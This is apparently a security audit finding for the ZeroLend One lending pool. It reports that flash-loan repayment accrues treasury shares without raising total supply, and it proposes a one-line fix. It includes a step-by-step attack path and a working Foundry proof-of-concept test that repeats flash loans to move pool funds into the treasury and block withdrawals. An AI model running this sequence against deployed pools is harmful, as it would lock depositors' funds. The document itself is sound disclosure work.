Joyous Cedar Tortoise

High

# _handleFlashLoanRepayment does not increment total supply when accruing to treasury

### Summary

[`FlashLoanLogic._handleFlashLoanRepayment()`](https://github.com/sherlock-audit/2024-06-new-scope/blob/a150815e6e6cae8b14a4ca5bb05d545f6a5e07ae/zerolend-one/contracts/core/pool/logic/FlashLoanLogic.sol#L106) does not increment total supply when accruing shares to the treasury

however when executing the mint to the treasury, it decreases total supply

This means that after a single flash loan occurs, the total supply of the shares will be less than the sum of each user’s share balance.

This leads to a race to withdraw since the last user will not be able to withdraw all their shares.

### Root Cause

FlashLoanLogic._handleFlashLoanRepayment() does not increment total supply when accruing shares to the treasury

### Internal pre-conditions

_No response_

### External pre-conditions

_No response_

### Attack Path

**Main vulnerability:**

Say the pool has 10 ETH supplied, and 10e18 shares

Say flash loan premium is `0.1%`

Let 100 flash loans occur, with average loaned amount of 5 ETH

Total premium paid = `0.1% * 100 * 5 ETH`  = `0.5` ETH

Hence, `0.5 ETH` worth of shares (assume 0.5e18 shares) were accrued to the treasury, but total supply was not increased

When the next withdrawal occurs, `0.5 ETH` will be transferred to the treasury, and `0.5e18` supply shares will be burned.

In the new state, `totalSupply.supplyShares` is equal to `9.5e18`

**The issue:** the sum of all users’s balance.supplyShares is still equal to `10e18`

This leads to a race to withdraw for the users, since the last user will not be able to withdraw `0.5e18`  shares.

**Alternative attack path:**

Say the pool has 10 ETH supplied, there is a vault that supplies liquidity to it

Say flash loan premium is `0.1%`

1. Supply 1 wei 
2. Take a flash loan of the entire pool liquidity, repay it immediately
3. Repeat step 2, 999 times ( $\frac{1}{0.1\%} -1$ times, where $0.1\%$ is the flash loan premium)
4. Take and repay one last flash loan, this time with `amount=1000 ETH - 1000 wei` (This ensures that the 1 wei of supply shares still remains)
5. Then redeem the 1 wei of shares. Within `executeMintToTreasury()`, it will burn the 10 ETH worth of shares, and transfer 10 ETH worth of assets to the treasury.

Now `supplyShares` = 0. As a result:

1. Nobody can supply via the vault, since `supplyAssets` within `_supplyPool` will always amount to `0`
2. Nobody can withdraw via the pool or via the vault, since reducing `supplyShares` any further will underflow.

### Impact

**Main impact:**

Due to incorrect share supply accounting, users will race to withdraw their funds from a pool after flash loan interest accrues. This leaves the last withdrawer at a loss since they will not be able to withdraw `0.5e18` shares.

**Impact for alternative attack path:**

Effectively, the funds stored in the pool are moved over to the treasury, so users are unable to withdraw the funds permanently. The attacker spends an amount equal to the pool assets. For smaller pools this is very feasible for the attacker.

### PoC

The alternative attack path is an extreme version of the main one. We have provided a PoC for the alternative attack path, which also proves the main impact (the main impact is that sum(user supplyShares) >  totalSupply.supplyShares)

**Running the PoC**
Add the import to test/forge/core/pool/PoolFlashLoanTests.t.sol
```solidity
import {console} from "../../../../lib/forge-std/src/console.sol";
```
Add this foundry test to `test/forge/core/pool/PoolFlashLoanTests.t.sol`
<details><summary>Foundry test </summary>

```solidity
function testJ_alt_flashLoanSpammer() public {
        bytes memory emptyParams;
        MockFlashLoanSimpleReceiver mockFlashSimpleReceiver = new MockFlashLoanSimpleReceiver(pool);
        _generateFlashloanCondition();

        address treasury = poolFactory.treasury();
        uint256 treasuryBalanceBefore = tokenA.balanceOf(treasury);
        uint256 poolBalanceBefore = tokenA.balanceOf(address(pool));
        poolFactory.setFlashloanPremium(10); // 0.1%
        
        console.log('BEFORE: total supply shares is %e', _getSupplyShares(address(tokenA)));

        vm.startPrank(alice);
        deal(address(tokenA), address(alice), 1 wei);
        tokenA.approve(address(pool), 1 wei);
        pool.supplySimple(address(tokenA), alice, 1 wei, 0);
        
        for (uint i = 0; i < 1000; i++) {
            pool.flashLoanSimple(address(mockFlashSimpleReceiver), address(tokenA), 2000 ether, emptyParams);
        }
        vm.stopPrank();


        vm.startPrank(alice);
        pool.withdrawSimple(address(tokenA), alice, 1 wei, 0);


        console.log('AFTER: total supply shares is %e', _getSupplyShares(address(tokenA)));

        uint256 treasuryBalanceAfter = tokenA.balanceOf(treasury);
        uint256 poolBalanceAfter = tokenA.balanceOf(address(pool));

        console.log("treasury balance: %e-->%e", treasuryBalanceBefore, treasuryBalanceAfter);
        console.log("pool balance: %e-->%e", poolBalanceBefore, poolBalanceAfter);
    }
```
</details>

**Console logs:**
```bash
[PASS] testJ_alt_flashLoanSpammer() (gas: 65941764)
Logs:
  BEFORE: total supply shares is 2e21
  AFTER: total supply shares is 0e0
  treasury balance: 0e0-->2e21
  pool balance: 2e21-->2e21
```


### Mitigation

Within `_handleFlashLoanRepayment()`, increment the total supply when minting shares to the treasury

```diff
    _reserve.accruedToTreasuryShares += _params.totalPremium.rayDiv(cache.nextLiquidityIndex).toUint128();
+   totalSupplies.supplyShares += _params.totalPremium.rayDiv(cache.nextLiquidityIndex).toUint128();
```